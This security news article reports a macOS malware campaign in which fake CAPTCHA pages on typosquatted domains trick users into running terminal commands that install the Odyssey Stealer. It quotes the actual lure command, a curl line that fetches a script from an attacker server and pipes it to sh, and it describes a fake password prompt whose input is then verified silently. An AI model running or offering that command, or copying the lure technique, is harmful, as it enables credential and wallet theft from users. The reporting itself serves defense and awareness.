Threat Actors Employ Clickfix Tactics to Deliver Malicious AppleScripts That Steal Login Credentials

A sophisticated new malware campaign targeting macOS users has emerged, employing deceptive “Clickfix” tactics to distribute malicious AppleScripts designed to harvest sensitive user credentials and financial data.

The campaign leverages typosquatted domains that closely mimic legitimate finance platforms and Apple App Store websites, creating a convincing facade that tricks users into executing dangerous commands on their systems.

The attack begins when users inadvertently visit malicious domains that present fake Cloudflare-style CAPTCHA prompts.

These seemingly legitimate verification pages instruct macOS users to copy and paste Base64-encoded commands into their terminal applications to prove they are not robots.

Once executed, these commands initiate a comprehensive data theft operation that targets browser credentials, cryptocurrency wallets, and sensitive personal information stored across multiple applications.

Cyfirma researchers identified this malware as the Odyssey Stealer, a rebranded version of the previously known Poseidon Stealer that itself originated as a fork of the AMOS Stealer.

The research team uncovered multiple command-and-control panels linked to this activity, with infrastructure primarily hosted in Russia.

The malware demonstrates a clear preference for targeting users in Western countries, particularly the United States and European Union, while conspicuously avoiding victims in Commonwealth of Independent States nations.

The Odyssey Stealer represents a concerning evolution in macOS-targeting malware, combining social engineering tactics with sophisticated technical capabilities.

Unlike traditional malware that relies on software vulnerabilities, this campaign exploits human psychology by presenting users with familiar-looking security prompts that appear to be routine verification procedures.

The attackers have carefully crafted their distribution websites to mirror trusted platforms, making detection particularly challenging for unsuspecting users.

Infection Mechanism and Payload Execution

The malware’s infection mechanism relies on a multi-stage process that begins with domain typosquatting and culminates in comprehensive system compromise.

When users visit the malicious domains, they encounter professionally designed pages that replicate the appearance of legitimate CAPTCHA verification systems.

The fake prompt displays instructions for macOS users to execute a command that appears as follows:-

curl -s http://odyssey1.to:3333/d?u=October | sh

This command retrieves and executes an AppleScript from the attacker’s command-and-control server. The script employs alphanumeric obfuscation to hide function names, though analysis reveals its true purpose.

Upon execution, the malware creates a temporary directory structure using the mkdir command, specifically establishing /tmp/lovemrtrump as its operational base.

The AppleScript then displays a convincing authentication prompt designed to capture the user’s system password.

To validate stolen credentials silently, it leverages the macOS dscl command with the authonly parameter, ensuring the verification process remains hidden from the user.

This technique allows the malware to confirm password validity without triggering system alerts or user suspicion, demonstrating the attackers’ deep understanding of macOS security mechanisms.

Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions -> Try ANY.RUN now